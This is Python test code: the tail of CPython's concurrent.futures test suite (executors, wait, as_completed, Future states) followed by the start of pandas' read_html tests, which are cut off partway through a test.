self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
queue_management_thread.join()
for p in processes.values():
p.join()
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, unittest.TestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, unittest.TestCase):
pass
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, unittest.TestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(os.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, unittest.TestCase):
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
@test.support.reap_threads
def test_main():
try:
test.support.run_unittest(__name__)
finally:
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
test_html.py
|
from functools import partial
from importlib import reload
from io import BytesIO, StringIO
import os
import re
import threading
import numpy as np
from numpy.random import rand
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame, Index, MultiIndex, Series, Timestamp, date_range, read_csv)
import pandas.util.testing as tm
from pandas.util.testing import makeCustomDataframe as mkdf, network
from pandas.io.common import URLError, file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(params=[
'chinese_utf-16.html',
'chinese_utf-32.html',
'chinese_utf-8.html',
'letz_latin1.html',
])
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath('io', 'data', 'html_encoding', request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), ('lists are not of equal size '
'len(list1) == {0}, '
'len(list2) == {1}'.format(len(list1),
len(list2)))
msg = 'not all list elements are DataFrames'
both_frames = all(map(lambda x, y: isinstance(x, DataFrame) and
isinstance(y, DataFrame), list1, list2))
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, 'frames are both empty'
@td.skip_if_no('bs4')
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, '__version__', '4.2')
with pytest.raises(ValueError, match="minimum version"):
read_html(datapath("io", "data", "spam.html"), flavor='bs4')
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, "google", flavor=flavor)
@td.skip_if_no('bs4')
@td.skip_if_no('lxml')
def test_same_ordering(datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs_lxml = read_html(filename, index_col=0, flavor=['lxml'])
dfs_bs4 = read_html(filename, index_col=0, flavor=['bs4'])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize("flavor", [
pytest.param('bs4', marks=pytest.mark.skipif(
not td.safe_import('lxml'), reason='No bs4')),
pytest.param('lxml', marks=pytest.mark.skipif(
not td.safe_import('lxml'), reason='No lxml'))], scope="class")
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath('io', 'data', 'spam.html')
self.spam_data_kwargs = {}
self.spam_data_kwargs['encoding'] = 'UTF-8'
self.banklist_data = datapath("io", "data", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = mkdf(4, 3, data_gen_f=lambda *args: rand(), c_idx_names=False,
r_idx_names=False).applymap('{0:.3f}'.format).astype(float)
out = df.to_html()
res = self.read_html(out, attrs={'class': 'dataframe'}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@network
def test_banklist_url(self):
url = 'http://www.fdic.gov/bank/individual/failed/banklist.html'
df1 = self.read_html(url, 'First Federal Bank of Florida',
attrs={"id": 'table'})
df2 = self.read_html(url, 'Metcalf Bank', attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
@network
def test_spam_url(self):
url = ('http://ndb.nal.usda.gov/ndb/foods/show/300772?fg=&man=&'
'lfacet=&format=&count=&max=25&offset=&sort=&qlookup=spam')
df1 = self.read_html(url, '.*Water.*')
df2 = self.read_html(url, 'Unit')
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(self.banklist_data, '.*Florida.*',
attrs={'id': 'table'})
df2 = self.read_html(self.banklist_data, 'Metcalf Bank',
attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, '.*Water.*')
df2 = self.read_html(self.spam_data, 'Unit')
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == 'Proximates'
assert df1[0].columns[0] == 'Nutrient'
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={'id': 'table'})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, '.*Water.*', header=2)[0]
assert df.columns[0] == 'Proximates'
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_xrange(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=range(2))[0]
df2 = self.read_html(self.spam_data, 'Unit', skiprows=range(2))[0]
tm.assert_frame_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=[1, 2])
df2 = self.read_html(self.spam_data, 'Unit', skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows={1, 2})
df2 = self.read_html(self.spam_data, 'Unit', skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, '.*Water.*',
skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=('is not a valid type '
'for skipping rows')):
self.read_html(self.spam_data, '.*Water.*', skiprows='asdf')
def test_index(self):
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, '.*Water.*')
df2 = self.read_html(data2, 'Unit')
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, '.*Water.*')
df2 = self.read_html(data, 'Unit')
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, '.*Water.*')
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, 'Unit')
assert_framelist_equal(df1, df2)
@network
def test_bad_url_protocol(self):
with pytest.raises(URLError):
self.read_html('git://github.com', match='.*Water.*')
@network
def test_invalid_url(self):
try:
with pytest.raises(URLError):
self.read_html('http://www.a23950sdfa908sd.com',
match='.*Water.*')
except ValueError as e:
assert 'No tables found' in str(e)
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
'First',
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match='No tables found'):
self.read_html(url, 'First Federal Bank of Florida',
attrs={'id': 'tasdfable'})
def _bank_data(self, *args, **kwargs):
return self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'}, *args, **kwargs)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
df = self._bank_data(header=[0, 1], skiprows=1,
tupleize_cols=True)[0]
assert isinstance(df.columns, Index)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile('Florida')),
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r'\(you passed a negative value\)'
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, 'Water', skiprows=-1)
@network
def test_multiple_matches(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
assert len(dfs) > 1
@network
def test_python_docs_table(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(['Repo', 'What'])
@pytest.mark.slow
def test_thousands_macau_stats(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath("io", "data", "macau.html")
dfs = self.read_html(macau_data, index_col=0,
attrs={'class': 'style1'})
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
@pytest.mark.slow
def test_thousands_macau_index_col(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath('io', 'data', 'macau.html')
dfs = self.read_html(macau_data, index_col=0, header=0)
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
result = self.read_html('''
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
''')
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html('''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data={'Header': 'first'}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[['Ukraine', 'Odessa', 1944]],
columns=['Country', 'Municipality', 'Year'])
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = '''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>'''
expected1 = DataFrame(data=[['bodyA', 'bodyB']], columns=['A', 'B'])
expected2 = DataFrame(data=[['bodyA', 'bodyB'], ['footA', 'footB']],
columns=['A', 'B'])
data1 = data_template.format(footer="")
data2 = data_template.format(
footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html('''
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
''', header=0)[0]
expected = DataFrame([['text', 1944]], columns=('S', 'I'))
tm.assert_frame_equal(result, expected)
def test_nyse_wsj_commas_table(self, datapath):
data = datapath('io', 'data', 'nyse_wsj.html')
df = self.read_html(data, index_col=0, header=0,
attrs={'class': 'mdcTable'})[0]
expected = Index(['Issue(Roll over for charts and headlines)',
'Volume', 'Price', 'Chg', '% Chg'])
nrows = 100
assert df.shape[0] == nrows
tm.assert_index_equal(df.columns, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'})[0]
ground_truth = read_csv(datapath('io', 'data', 'banklist.csv'),
converters={'Updated Date': Timestamp,
'Closing Date': Timestamp})
assert df.shape == ground_truth.shape
old = ['First Vietnamese American BankIn Vietnamese',
'Westernbank Puerto RicoEn Espanol',
'R-G Premier Bank of Puerto RicoEn Espanol',
'EurobankEn Espanol', 'Sanderson State BankEn Espanol',
